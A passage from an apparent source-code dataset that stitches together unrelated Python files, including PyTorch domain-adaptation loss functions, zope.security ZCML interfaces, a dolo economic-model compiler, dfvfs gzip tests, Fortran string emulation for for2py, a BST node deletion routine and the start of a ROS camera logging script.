if torch.cuda.is_available():
x = x.cpu()
return x.data.numpy()
def classification_accuracy(data_loader,DNN,FC):
with torch.no_grad():
correct = 0
for batch_idx, (X, lab) in enumerate(data_loader):
X, lab = to_var(X), to_var(lab).long().squeeze()
_, prob = FC(DNN(X))
plab = prob.data.max(1)[1]
correct += plab.eq(lab.data).cpu().sum()
accuracy = correct.item() / len(data_loader.dataset)
return accuracy
def inv_lr_scheduler(param_lr, optimizer, iter_num, gamma, power, init_lr=0.001, weight_decay=0.0005):
"""Decay learning rate by a factor of 0.1 every lr_decay_epoch epochs."""
lr = init_lr * (1 + gamma * iter_num) ** (-power)
i = 0
for param_group in optimizer.param_groups:
param_group['lr'] = lr * param_lr[i]
param_group['weight_decay'] = weight_decay * 2
i += 1
return optimizer
schedule_dict = {"inv":inv_lr_scheduler}
##################################
# Objective Functions
##################################
# Cross-Entropy Loss
NLL_loss = torch.nn.NLLLoss().cuda()
def Cross_Entropy(prob,lab):
CE_loss = NLL_loss(torch.log(prob+1e-4), lab)
return CE_loss
# Entropy Loss
def Entropy(prob):
    num_sam = prob.shape[0]
    # keep the epsilon inside the log for numerical stability (log(0) is -inf)
    ent = -(prob.mul((prob + 1e-4).log())).sum()
    return ent / num_sam
# CKB loss
def CKB_Metric(fea_s, fea_t, lab_s, plab_t, prob_t, num_cls, epsilon=1e-2, CKB_type='soft'):
# Y: label, Z: fea, matching conditional distribution P(Z|Y)
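    # Outline of the estimator below: Gaussian kernels (bandwidth = mean pairwise
    # squared distance) are built for labels (Y) and features (Z) on both domains;
    # epsilon is the ridge regulariser applied to the centered label-kernel inverses,
    # and the final distance combines tr(R_s), tr(R_t) and the singular values of a
    # cross-domain kernel term, measuring the gap between the conditional
    # distributions P(Z|Y) of the two domains.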
num_sam_s = fea_s.shape[0]
num_sam_t = fea_t.shape[0]
OneHot_s = torch.zeros(num_sam_s,num_cls).cuda().scatter(1,lab_s.unsqueeze(1),1).detach()
if CKB_type == 'hard':
prob_t = torch.zeros(num_sam_t,num_cls).cuda().scatter(1,plab_t.unsqueeze(1),1).detach()
elif CKB_type == 'soft':
prob_t = prob_t.detach()
else:
sys.exit('Error: invalid CKB_type')
I_s = torch.eye(num_sam_s).cuda()
I_t = torch.eye(num_sam_t).cuda()
#====== Kernel Matrix and Centering Matrix =======
H_s = ( torch.eye(num_sam_s) - torch.ones(num_sam_s)/num_sam_s ).cuda()
H_t = ( torch.eye(num_sam_t) - torch.ones(num_sam_t)/num_sam_t ).cuda()
D_YsYs = OneHot_s.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\
OneHot_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_s,1) -\
2*torch.mm(OneHot_s,OneHot_s.t())
D_YtYt = prob_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_t) +\
prob_t.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\
2*torch.mm(prob_t,prob_t.t())
D_ZsZs = fea_s.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\
fea_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_s,1) -\
2*torch.mm(fea_s,fea_s.t())
D_ZtZt = fea_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_t) +\
fea_t.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\
2*torch.mm(fea_t,fea_t.t())
D_ZtZs = fea_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\
fea_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\
2*torch.mm(fea_t,fea_s.t())
sigma_YsYs = D_YsYs.mean().detach()
sigma_YtYt = D_YtYt.mean().detach()
sigma_ZsZs = D_ZsZs.mean().detach()
sigma_ZtZt = D_ZtZt.mean().detach()
sigma_ZtZs = D_ZtZs.mean().detach()
K_YsYs = (-D_YsYs/sigma_YsYs).exp()
K_YtYt = (-D_YtYt/sigma_YtYt).exp()
K_ZsZs = (-D_ZsZs/sigma_ZsZs).exp()
K_ZtZt = (-D_ZtZt/sigma_ZtZt).exp()
K_ZtZs = (-D_ZtZs/sigma_ZtZs).exp()
G_Ys = (H_s.mm(K_YsYs)).mm(H_s)
G_Yt = (H_t.mm(K_YtYt)).mm(H_t)
G_Zs = (H_s.mm(K_ZsZs)).mm(H_s)
G_Zt = (H_t.mm(K_ZtZt)).mm(H_t)
#====== R_{s} and R_{t} =======
Inv_s = (epsilon*num_sam_s*I_s + G_Ys).inverse()
Inv_t = (epsilon*num_sam_t*I_t + G_Yt).inverse()
R_s = epsilon*G_Zs.mm(Inv_s)
R_t = epsilon*G_Zt.mm(Inv_t)
#====== R_{st} =======
# B_s = I_s - (G_Ys - (G_Ys.mm(Inv_s)).mm(G_Ys))/(num_sam_s*epsilon)
# B_t = I_t - (G_Yt - (G_Yt.mm(Inv_t)).mm(G_Yt))/(num_sam_t*epsilon)
B_s = num_sam_s*epsilon*Inv_s
B_t = num_sam_t*epsilon*Inv_t
B_s = (B_s + B_s.t())/2 # numerical symmetrize
B_t = (B_t + B_t.t())/2 # numerical symmetrize
S_s, U_s = B_s.symeig(eigenvectors=True)
S_t, U_t = B_t.symeig(eigenvectors=True)
HC_s = H_s.mm( U_s.mm((S_s+1e-4).pow(0.5).diag()) )
HC_t = H_t.mm( U_t.mm((S_t+1e-4).pow(0.5).diag()) )
Nuclear = (HC_t.t().mm(K_ZtZs)).mm(HC_s)
U_n, S_n, V_n = torch.svd(Nuclear)
#====== Conditional KB Distance
CKB_dist = R_s.trace() + R_t.trace() - 2*S_n[:-1].sum()/((num_sam_s*num_sam_t)**0.5)
return CKB_dist
# MMD loss
def MMD_Metric(prob_s, prob_t):
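    # Squared Maximum Mean Discrepancy with Gaussian kernels between the source
    # and target prediction distributions:
    #   MMD^2 = mean(K_ss) + mean(K_tt) - 2 * mean(K_ts),
    # where each kernel bandwidth is set to the mean pairwise squared distance.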
num_sam_s = prob_s.shape[0]
num_sam_t = prob_t.shape[0]
D_XsXs = prob_s.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\
prob_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_s,1) -\
2*torch.mm(prob_s,prob_s.t())
D_XtXt = prob_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_t) +\
prob_t.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\
2*torch.mm(prob_t,prob_t.t())
D_XtXs = prob_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\
prob_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\
2*torch.mm(prob_t,prob_s.t())
sigma_XsXs = D_XsXs.mean().detach()
sigma_XtXt = D_XtXt.mean().detach()
sigma_XtXs = D_XtXs.mean().detach()
K_XsXs = (-D_XsXs/sigma_XsXs).exp()
K_XtXt = (-D_XtXt/sigma_XtXt).exp()
K_XtXs = (-D_XtXs/sigma_XtXs).exp()
MMD_dist = K_XsXs.mean() + K_XtXt.mean() - 2*K_XtXs.mean()
return MMD_dist
| 2.796875 | 3 |
Time_Series_DataAnalysis_Tool/__init__.py | chetanrrk/Time_Series_Data_Analysis_Tools | 1 | 12796195 | import Time_Series_DataAnalysis_Tool.time_series_analysis
import Time_Series_DataAnalysis_Tool.examples
import Time_Series_DataAnalysis_Tool.test
| 1 | 1 |
spladder/classes/counts.py | ratschlab/spladder | 96 | 12796196 | <filename>spladder/classes/counts.py
import numpy as np
class Counts:
def __init__(self, seg_num):
self.segments = np.zeros((seg_num,), dtype='float')
self.seg_pos = np.zeros((seg_num,), dtype='float')
self.edges = np.zeros((0, 2), dtype='float')
| 2.796875 | 3 |
ven2/lib/python2.7/site-packages/zope/security/metadirectives.py | manliu1225/Facebook_crawler | 3 | 12796197 | <reponame>manliu1225/Facebook_crawler
##############################################################################
#
# Copyright (c) 2001, 2002 Zope Foundation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
"""Component architecture related 'zope' ZCML namespace directive interfaces
"""
__docformat__ = 'restructuredtext'
import zope.configuration.fields
from zope.configuration.fields import GlobalObject, GlobalInterface
from zope.configuration.fields import Tokens, PythonIdentifier
import zope.interface
import zope.schema
from zope.interface import Interface
import zope.security.zcml
from zope.security.i18n import ZopeMessageFactory as _
from zope.security.zcml import Permission
class IClassDirective(zope.interface.Interface):
"""Make statements about a class"""
class_ = zope.configuration.fields.GlobalObject(
title=_("Class"),
required=True
)
class IImplementsSubdirective(zope.interface.Interface):
"""Declare that the class given by the content directive's class
attribute implements a given interface
"""
interface = zope.configuration.fields.Tokens(
title=_("One or more interfaces"),
required=True,
value_type=zope.configuration.fields.GlobalInterface()
)
class IRequireSubdirective(zope.interface.Interface):
"""Indicate that the a specified list of names or the names in a
given Interface require a given permission for access.
"""
permission = zope.security.zcml.Permission(
title=_("Permission"),
description=_("""
Specifies the permission by id that will be required to
access or mutate the attributes and methods specified."""),
required=False,
)
attributes = zope.configuration.fields.Tokens(
title=_("Attributes and methods"),
description=_("This is a list of attributes and methods"
" that can be accessed."),
required=False,
value_type=zope.configuration.fields.PythonIdentifier(),
)
set_attributes = zope.configuration.fields.Tokens(
title=_("Attributes that can be set"),
description=_("This is a list of attributes that can be"
" modified/mutated."),
required=False,
value_type=zope.configuration.fields.PythonIdentifier(),
)
interface = zope.configuration.fields.Tokens(
title=_("Interfaces"),
description=_("The listed interfaces' methods and attributes"
" can be accessed."),
required=False,
value_type=zope.configuration.fields.GlobalInterface(),
)
set_schema = zope.configuration.fields.Tokens(
title=_("The attributes specified by the schema can be set"),
description=_("The listed schemas' properties can be"
" modified/mutated."),
required=False,
value_type=zope.configuration.fields.GlobalInterface(),
)
like_class = zope.configuration.fields.GlobalObject(
title=_("Configure like this class"),
description=_("""
This argument says that this content class should be configured in the
same way the specified class' security is. If this argument is
specified, no other argument can be used."""),
required=False,
)
class IAllowSubdirective(zope.interface.Interface):
"""
Declare a part of the class to be publicly viewable (that is,
requires the zope.Public permission). Only one of the following
two attributes may be used.
"""
attributes = zope.configuration.fields.Tokens(
title=_("Attributes"),
required=False,
value_type=zope.configuration.fields.PythonIdentifier(),
)
interface = zope.configuration.fields.Tokens(
title=_("Interface"),
required=False,
value_type=zope.configuration.fields.GlobalInterface(),
)
class IFactorySubdirective(zope.interface.Interface):
"""Specify the factory used to create this content object"""
id = zope.schema.Id(
title=_("ID"),
description=_("""
the identifier for this factory in the ZMI factory
identification scheme. If not given, defaults to the literal
string given as the content directive's 'class' attribute."""),
required=False,
)
title = zope.configuration.fields.MessageID(
title=_("Title"),
description=_("Text suitable for use in the 'add content' menu"
" of a management interface"),
required=False,
)
description = zope.configuration.fields.MessageID(
title=_("Description"),
description=_("Longer narrative description of what this"
" factory does"),
required=False,
)
class IModule(Interface):
"""Group security declarations about a module"""
module = GlobalObject(
title=u"Module",
description=u"Pointer to the module object.",
required=True)
class IAllow(Interface):
"""Allow access to selected module attributes
Access is unconditionally allowed to any names provided directly
in the attributes attribute or to any names defined by
interfaces listed in the interface attribute.
"""
attributes = Tokens(
title=u"Attributes",
description=u"The attributes to provide access to.",
value_type=PythonIdentifier(),
required=False)
interface = Tokens(
title=u"Interface",
description=(u"Interfaces whos names to provide access to. Access "
u"will be provided to all of the names defined by the "
u"interface(s). Multiple interfaces can be supplied."),
value_type=GlobalInterface(),
required=False)
class IRequire(Interface):
"""Require a permission to access selected module attributes
The given permission is required to access any names provided
directly in the attributes attribute or any names defined by
interfaces listed in the interface attribute.
"""
attributes = Tokens(
title=u"Attributes",
description=u"The attributes to require permission for.",
value_type=PythonIdentifier(),
required=False)
permission = Permission(
title=u"Permission ID",
description=u"The ID of the permission to require.")
| 1.703125 | 2 |
src/compas_singular/rhino/rhino/__init__.py | christiandimitri/compas_singular | 1 | 12796198 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from .density import *
from .display import *
from .getters import *
from .pattern import *
from .patternartist import *
__all__ = [name for name in dir() if not name.startswith('_')]
| 1.507813 | 2 |
uc2data/helpers.py | TUBklima/UC2Data | 6 | 12796199 | from .Dataset import Dataset
from pathlib import Path
def check_multi(folder):
pathlist = Path(folder).glob('**/*.nc')
for path in pathlist:
outfile = Path(str(path).replace(".nc", ".check"))
try:
with Dataset(path) as i_data:
i_data.uc2_check()
i_data.check_result.to_file(outfile, full=False)
except Exception:
text_file = open(str(outfile), "w")
text_file.write("Could not read file: "+str(path))
text_file.close()
| 2.578125 | 3 |
dolo/compiler/model_numeric.py | zlqs1985/dolo | 0 | 12796200 | import ast
from collections import OrderedDict
from .codegen import to_source
from .function_compiler_ast import timeshift, StandardizeDatesSimple
from dolo.compiler.recipes import recipes
from numba import njit
class NumericModel:
calibration = None
calibration_dict = None
covariances = None
markov_chain = None
def __init__(self, symbolic_model, options=None, infos=None):
self.symbolic = symbolic_model
self.symbols = symbolic_model.symbols
self.variables = sum( [tuple(e) for k,e in self.symbols.items() if k not in ('parameters','shocks','values')], ())
self.options = options if options is not None else {}
self.infos = infos if infos is not None else {}
self.infos['data_layout'] = 'columns'
self.name = self.infos['name']
self.model_type = self.infos['type']
# self.model_spec
self.__update_from_symbolic__()
self.__compile_functions__()
def __update_from_symbolic__(self):
import numpy
# updates calibration according to the symbolic definitions
system = self.symbolic.calibration_dict
from dolo.compiler.triangular_solver import solve_triangular_system
self.calibration_dict = solve_triangular_system( system )
from dolo.compiler.misc import CalibrationDict, calibration_to_vector
calib = calibration_to_vector(self.symbols, self.calibration_dict)
self.calibration = CalibrationDict(self.symbols, calib)
from .symbolic_eval import NumericEval
evaluator = NumericEval(self.calibration_dict)
# read symbolic structure
self.options = evaluator.eval(self.symbolic.options)
distribution = evaluator.eval(self.symbolic.distribution)
discrete_transition = evaluator.eval(self.symbolic.discrete_transition)
covariances = distribution
if distribution is None:
self.covariances = None
else:
self.covariances = numpy.atleast_2d(numpy.array(covariances, dtype=float))
markov_chain = discrete_transition
if markov_chain is None:
self.markov_chain = None
else:
self.markov_chain = [numpy.atleast_2d(numpy.array(tab, dtype=float)) for tab in markov_chain]
def get_calibration(self, pname, *args):
if isinstance(pname, list):
return [ self.get_calibration(p) for p in pname ]
elif isinstance(pname, tuple):
return tuple( [ self.get_calibration(p) for p in pname ] )
elif len(args)>0:
pnames = (pname,) + args
return self.get_calibration(pnames)
group = [g for g in self.symbols.keys() if pname in self.symbols[g]]
try:
group = group[0]
except:
raise Exception('Unknown symbol {}.'.format(pname))
i = self.symbols[group].index(pname)
v = self.calibration[group][i]
return v
def set_calibration(self, *args, **kwargs):
# raise exception if unknown symbol ?
if len(args)==2:
pname, pvalue = args
if isinstance(pname, str):
self.set_calibration(**{pname:pvalue})
else:
# else ignore pname and pvalue
calib = self.symbolic.calibration_dict
calib.update(kwargs)
self.__update_from_symbolic__()
def __str__(self):
from dolo.misc.termcolor import colored
s = u'''
Model object:
------------
- name: "{name}"
- type: "{type}"
- file: "{filename}\n'''.format(**self.infos)
ss = '\n- residuals:\n\n'
res = self.residuals()
# for eqgroup, eqlist in self.symbolic.equations.items():
for eqgroup in res.keys():
eqlist = self.symbolic.equations[eqgroup]
ss += u" {}\n".format(eqgroup)
for i, eq in enumerate(eqlist):
val = res[eqgroup][i]
if abs(val) < 1e-8:
val = 0
vals = '{:.4f}'.format(val)
if abs(val) > 1e-8:
vals = colored(vals, 'red')
# eq = eq.replace('|', u"\u27C2")
ss += u" {eqn:3} : {vals} : {eqs}\n".format(eqn=str(i+1), vals=vals, eqs=eq)
ss += "\n"
s += ss
# import pprint
# s += '- residuals:\n'
# s += pprint.pformat(compute_residuals(self),indent=2, depth=1)
return s
def __repr__(self):
return self.__str__()
@property
def x_bounds(self):
if 'controls_ub' in self.functions:
fun_lb = self.functions['controls_lb']
fun_ub = self.functions['controls_ub']
return [fun_lb, fun_ub]
else:
return None
def residuals(self, calib=None):
if self.model_type == 'dtcscc':
from dolo.algos.dtcscc.steady_state import residuals
return residuals(self, calib)
elif self.model_type == 'dtmscc':
from dolo.algos.dtmscc.steady_state import residuals
return residuals(self, calib)
def eval_formula(self, expr, dataframe=None, calib=None):
from dolo.compiler.eval_formula import eval_formula
if calib is None:
calib = self.calibration
return eval_formula(expr, dataframe=dataframe, context=calib)
def __compile_functions__(self):
from dolo.compiler.function_compiler_ast import compile_function_ast
from dolo.compiler.function_compiler import standard_function
defs = self.symbolic.definitions
# works for fg models only
model_type = self.model_type
if 'auxiliaries' not in self.symbols:
model_type += '_'
else:
# prepare auxiliaries
auxeqs = self.symbolic.equations['auxiliary']
auxdefs = {}
for time in [-1,0,1]:
dd = OrderedDict()
for eq in auxeqs:
lhs, rhs = eq.split('=')
lhs = ast.parse( str.strip(lhs) ).body[0].value
rhs = ast.parse( str.strip(rhs) ).body[0].value
tmp = timeshift(rhs, self.variables, time)
k = timeshift(lhs, self.variables, time)
k = StandardizeDatesSimple(self.variables).visit(k)
v = StandardizeDatesSimple(self.variables).visit(tmp)
dd[to_source(k)] = to_source(v)
auxdefs[time] = dd
recipe = recipes[model_type]
symbols = self.symbols # should match self.symbols
comps = []
functions = {}
original_functions = {}
original_gufunctions = {}
for funname in recipe['specs'].keys():
spec = recipe['specs'][funname]
if funname not in self.symbolic.equations:
if not spec.get('optional'):
raise Exception("The model doesn't contain equations of type '{}'.".format(funname))
else:
continue
if spec.get('target'):
# keep only right-hand side
# TODO: restore recursive definitions
eqs = self.symbolic.equations[funname]
eqs = [eq.split('=')[1] for eq in eqs]
eqs = [str.strip(eq) for eq in eqs]
target_spec = spec.get('target')
n_output = len(self.symbols[target_spec[0]])
# target_short_name = spec.get('target')[2]
if spec.get('recursive') is False:
target_spec = None
else:
target_spec[2] = 'out'
else:
target_spec = None
if spec.get('complementarities'):
# TODO: Rewrite and simplify
comp_spec = spec.get('complementarities')
comp_order = comp_spec['middle']
comp_args = comp_spec['left-right']
comps = []
eqs = []
for i,eq in enumerate(self.symbolic.equations[funname]):
if '|' in eq:
control = self.symbols[comp_order[0]][i]
eq, comp = str.split(eq,'|')
lhs, rhs = decode_complementarity(comp, control)
comps.append([lhs, rhs])
else:
comps.append(['-inf', 'inf'])
eqs.append(eq)
comp_lhs, comp_rhs = zip(*comps)
# fb_names = ['{}_lb'.format(funname), '{}_ub'.format(funname)]
fb_names = ['controls_lb'.format(funname), 'controls_ub'.format(funname)]
ddefs = OrderedDict()
for ag in comp_args:
if ag[0] == 'auxiliaries':
t = ag[1]
ddefs.update(auxdefs[t])
ddefs.update(defs)
lower_bound, gu_lower_bound = compile_function_ast(comp_lhs, symbols, comp_args, funname=fb_names[0],definitions=defs)
upper_bound, gu_upper_bound = compile_function_ast(comp_rhs, symbols, comp_args, funname=fb_names[1],definitions=defs)
n_output = len(comp_lhs)
functions[fb_names[0]] = standard_function(gu_lower_bound, n_output )
functions[fb_names[1]] = standard_function(gu_upper_bound, n_output )
original_functions[fb_names[0]] = lower_bound
original_functions[fb_names[1]] = upper_bound
original_gufunctions[fb_names[0]] = gu_lower_bound
original_gufunctions[fb_names[1]] = gu_upper_bound
# rewrite all equations as rhs - lhs
def filter_equal(eq):
if '=' in eq:
lhs, rhs = str.split(eq,'=')
eq = '{} - ( {} )'.format(rhs, lhs)
eq = str.strip(eq)
return eq
else:
return eq
eqs = [filter_equal(eq) for eq in eqs]
arg_names = recipe['specs'][funname]['eqs']
ddefs = OrderedDict()
for ag in arg_names:
if ag[0] == 'auxiliaries':
t = ag[1]
ddefs.update(auxdefs[t])
ddefs.update(defs)
fun, gufun = compile_function_ast(eqs, symbols, arg_names,
output_names=target_spec, funname=funname, definitions=ddefs,
)
# print("So far so good !")c
n_output = len(eqs)
original_functions[funname] = fun
functions[funname] = standard_function(gufun, n_output )
original_functions[funname] = fun
original_gufunctions[funname] = gufun
self.__original_functions__ = original_functions
self.__original_gufunctions__ = original_gufunctions
self.functions = functions
import re
regex = re.compile("(.*)<=(.*)<=(.*)")
def decode_complementarity(comp, control):
'''
# comp can be either:
- None
- "a<=expr" where a is a controls
- "expr<=a" where a is a control
- "expr1<=a<=expr2"
'''
try:
res = regex.match(comp).groups()
except:
raise Exception("Unable to parse complementarity condition '{}'".format(comp))
res = [r.strip() for r in res]
if res[1] != control:
msg = "Complementarity condition '{}' incorrect. Expected {} instead of {}.".format(comp, control, res[1])
raise Exception(msg)
return [res[0], res[2]]
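    # Example: decode_complementarity("0 <= i <= x", "i") returns ['0', 'x'].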
| 2.125 | 2 |
tests/bmc_test.py | reich6534/SumoPY | 0 | 12796201 | <reponame>reich6534/SumoPY<filename>tests/bmc_test.py
from nose.tools import *
from bmc.book import Book
def setup():
print ("SETUP!")
def teardown():
print("TEAR DOWN!")
def test_bookname():
matthew = Book("Matthew", 27)
assert_equal(matthew.name, "Matthew")
@raises (IndexError)
def test_small():
B = Book("Genesis", 50)
B.set_chapter_descr(0, "This should fail")
@raises(IndexError)
def test_big():
B = Book("Revelation", 22)
B.set_chapter_descr(23, "This should fail")
@raises(ValueError)
def test_bigbook():
Book("Exodus", 151)
@raises(ValueError)
def test_smallbook():
Book("Obadiah", 0)
| 2.328125 | 2 |
tests/vfs/gzip_file_system.py | Defense-Cyber-Crime-Center/dfvfs | 2 | 12796202 | #!/usr/bin/python
# -*- coding: utf-8 -*-
"""Tests for the file system implementation using gzip."""
import os
import unittest
from dfvfs.path import gzip_path_spec
from dfvfs.path import os_path_spec
from dfvfs.resolver import context
from dfvfs.vfs import gzip_file_system
class GzipFileSystemTest(unittest.TestCase):
"""The unit test for the gzip file system object."""
def setUp(self):
"""Sets up the needed objects used throughout the test."""
self._resolver_context = context.Context()
test_file = os.path.join(u'test_data', u'syslog.gz')
path_spec = os_path_spec.OSPathSpec(location=test_file)
self._gzip_path_spec = gzip_path_spec.GzipPathSpec(parent=path_spec)
def testOpenAndClose(self):
"""Test the open and close functionality."""
file_system = gzip_file_system.GzipFileSystem(self._resolver_context)
self.assertNotEqual(file_system, None)
file_system.Open(path_spec=self._gzip_path_spec)
file_system.Close()
def testFileEntryExistsByPathSpec(self):
"""Test the file entry exists by path specification functionality."""
file_system = gzip_file_system.GzipFileSystem(self._resolver_context)
self.assertNotEqual(file_system, None)
file_system.Open(path_spec=self._gzip_path_spec)
self.assertTrue(file_system.FileEntryExistsByPathSpec(self._gzip_path_spec))
file_system.Close()
def testGetFileEntryByPathSpec(self):
"""Test the get entry by path specification functionality."""
file_system = gzip_file_system.GzipFileSystem(self._resolver_context)
self.assertNotEqual(file_system, None)
file_system.Open(path_spec=self._gzip_path_spec)
file_entry = file_system.GetFileEntryByPathSpec(self._gzip_path_spec)
self.assertNotEqual(file_entry, None)
self.assertEqual(file_entry.name, u'')
file_system.Close()
def testGetRootFileEntry(self):
"""Test the get root file entry functionality."""
file_system = gzip_file_system.GzipFileSystem(self._resolver_context)
self.assertNotEqual(file_system, None)
file_system.Open(path_spec=self._gzip_path_spec)
file_entry = file_system.GetRootFileEntry()
self.assertNotEqual(file_entry, None)
self.assertEqual(file_entry.name, u'')
file_system.Close()
if __name__ == '__main__':
unittest.main()
| 2.609375 | 3 |
Informatik1/Midterms Prep/midterms hs19/count_keywords.py | Queentaker/uzh | 8 | 12796203 | <reponame>Queentaker/uzh<filename>Informatik1/Midterms Prep/midterms hs19/count_keywords.py
def count_keywords(path, keywords):
words = []
sol = dict()
with open(path) as file:
for line in file:
for word in line.split():
words.append(word.lower())
for element in words:
if element in keywords:
if element in sol:
sol[element] += 1
else: sol[element] = 1
else:
continue
return sol
print(count_keywords("/Users/merterol/Desktop/uzhpython/uzh/Informatik1/MidtermsInfk/midterms hs19/text.txt", ["forest", "the", "found"]))
print(count_keywords("/Users/merterol/Desktop/uzhpython/uzh/Informatik1/MidtermsInfk/midterms hs19/text.txt", ["black"]))
print(count_keywords("/Users/merterol/Desktop/uzhpython/uzh/Informatik1/MidtermsInfk/midterms hs19/text.txt", [])) | 3.46875 | 3 |
delphi/translators/for2py/strings.py | mikiec84/delphi | 25 | 12796204 | <filename>delphi/translators/for2py/strings.py
"""
File: strings.py
Purpose: Code implementing string objects (corresponding to the Fortran
CHARACTER type) in the code generated by for2py.
Usage: see the document "for2py: Miscellaneous constructs"
"""
class String:
def __init__(self, length = 0, value = ""):
if length > 0:
self._length = length
else:
self._length = len(value)
# Before value is assigned to self._val, it may need to be adjusted
# if len(value) != length
self.set_(value)
def value(self, obj):
if isinstance(obj, String):
return obj._val
else:
return obj
def padding(self, n):
"""padding() returns a string of blanks of length = sef._length - n."""
if n < self._length: # pad with blanks
k = self._length - n
pad_str = " " * k
else:
pad_str = ""
return pad_str
def set_(self, strval):
s = self.value(strval)
n = len(s)
if n < self._length:
adjusted = s + self.padding(n)
else:
adjusted = s[:self._length] # truncate to self._length
self._val = adjusted
def __len__(self):
return self._length
def __add__(self, other):
"""String concatenation"""
return self._val + self.value(other)
def __radd__(self, other):
"""String concatenation"""
return self.value(other) + self._val
def adjustl(self):
"""adjustl() implements the ADJUSTL() function of Fortran. This
function removes leading blanks and adds blanks on the right
so that the result is the same length as the input string."""
s = self._val.lstrip()
pad_str = self.padding(len(s))
return s + pad_str
def adjustr(self):
"""adjustr() implements the ADJUSTR() function of Fortran. This
function removes trailing blanks and adds blanks on the left
so that the result is the same length as the input string."""
s = self._val.rstrip()
pad_str = self.padding(len(s))
return pad_str + s
def f_index(self, substring, direction=[]):
"""f_index() implements the string search function of Fortran's INDEX()
function; we use the name f_index to emphasize that the behavior of
Fortran's INDEX() is slightly different from that of Python's index().
f_index() returns the position within a string where substring
first occurs; 0 if there is no such occurrence. If the argument
direction contains "back" the string is searched backwards starting
from the end."""
substr = self.value(substring)
if "back" in direction:
pos = self._val.rfind(substr)
else:
pos = self._val.find(substr)
return pos + 1
def len_trim(self):
return len(self._val.rstrip())
def repeat(self, n):
return self._val * n
def trim(self):
return self._val.rstrip()
def get_substr(self, i, j):
"""get_substr(i, j) returns the substring of the given string beginning
at position i (start position = 1) and ending at position j."""
return self._val[(i-1):j]
def set_substr(self, i, j, other):
# extract the substring
substr = self.value(other)[:(j-i+1)]
# construct the new string value
newstr = self._val[:(i-1)] + substr + self._val[j:]
# update
self.set_(newstr)
def __str__(self):
return self._val
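# Illustrative usage (a quick sketch; the values follow from the methods above):
if __name__ == "__main__":
    s = String(8, "hello")              # stored padded to length 8: "hello   "
    print(s.f_index("lo"))              # 4: 1-based position, Fortran INDEX semantics
    print("[" + s.adjustr() + "]")      # prints "[   hello]": blanks moved to the left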
| 3.140625 | 3 |
functional-problems/deleteNodeFromBst.py | vikas-t/DS-Algo | 0 | 12796205 | <filename>functional-problems/deleteNodeFromBst.py
#!/usr/bin/python3
# https://practice.geeksforgeeks.org/problems/delete-a-node-from-bst/1
def minValueNode(root):
"""
Returns the iorder successor or the next higher node as per
the inorder traversal
"""
current = root
# loop down to find the leftmost leaf
while(current.left is not None):
current = current.left
return current
def deleteNode(root, key):
if root == None:
return
if key < root.data:
root.left = deleteNode(root.left, key)
# If the key to be deleted is smaller than the root's
# key then it lies in left subtree
elif key > root.data:
root.right = deleteNode(root.right, key)
# If the key to be deleted is greater than the root's
# key then it lies in right part
else:
# The key is same as root's key, then this is the node to be deleted
if root.left == None:
tmp = root.right
root = None
return tmp
elif root.right == None:
tmp = root.left
root = None
return tmp
        # The branches above cover the cases where the root has one child or none
        v = minValueNode(root.right)
        # When both children exist, use the inorder successor
root.data = v.data
root.right = deleteNode(root.right, v.data)
# Delete the inorder successor
return root
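# Minimal driver sketch: a simple Node class is assumed here (the judge normally
# supplies its own) so the function above can be exercised standalone.
class Node:
    def __init__(self, data):
        self.data = data
        self.left = None
        self.right = None

if __name__ == "__main__":
    root = Node(50)
    root.left, root.right = Node(30), Node(70)
    root = deleteNode(root, 30)                     # removes the leaf 30
    print(root.data, root.left, root.right.data)    # 50 None 70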
| 3.984375 | 4 |
codeforces/acmsguru/112.py | Ashindustry007/competitive-programming | 506 | 12796206 | #!/usr/bin/env python3
# https://codeforces.com/problemsets/acmsguru/problem/99999/112
a,b=map(int,input().split())
print(pow(a,b)-pow(b,a))
| 3.265625 | 3 |
catkin_ws/src/tugasakhir/ta_vision/scripts/uji_transdata.py | musyafaarif/workspace | 0 | 12796207 | #!/usr/bin/env python3
import ta_vision
from vision.camera import Camera
from color_detection import ColorDetection
import cv2 as cv
import rospy
import time
import math
from geometry_msgs.msg import PointStamped
from gazebo_msgs.msg import ModelStates
from gazebo_msgs.srv import SetModelState
from gazebo_msgs.msg import ModelState
from geometry_msgs.msg import Pose
from geometry_msgs.msg import Point
from geometry_msgs.msg import Quaternion
from tf.transformations import euler_from_quaternion, quaternion_from_euler
import csv
lower_threshold = (160, 190, 220)
upper_threshold = (180, 230, 255)
FW = 320
FH = 240
FOVX = 62.2
FOVY = 48.8
KX = FOVX / FW / 180.0 * math.pi
KY = FOVY / FH / 180.0 * math.pi
# CSV
cam_csv = open('/home/musyafa/Datalog/cam.csv', 'w')
real_csv = open('/home/musyafa/Datalog/real.csv', 'w')
cam_writer = csv.writer(cam_csv)
real_writer = csv.writer(real_csv)
cam_writer.writerow(['Time', 'Cam Position X', 'Cam Position Y', 'Time', 'Real Position X', 'Real Position Y'])
real_writer.writerow(['Time', 'Real Position X', 'Real Position Y'])
waktu = rospy.Time(0)
pose = Pose()
z = 0
roll = 0
pitch = 0
yaw = 0
def models_cb(msg):
global pose, z, roll, pitch, yaw, waktu
pose = msg.pose[1]
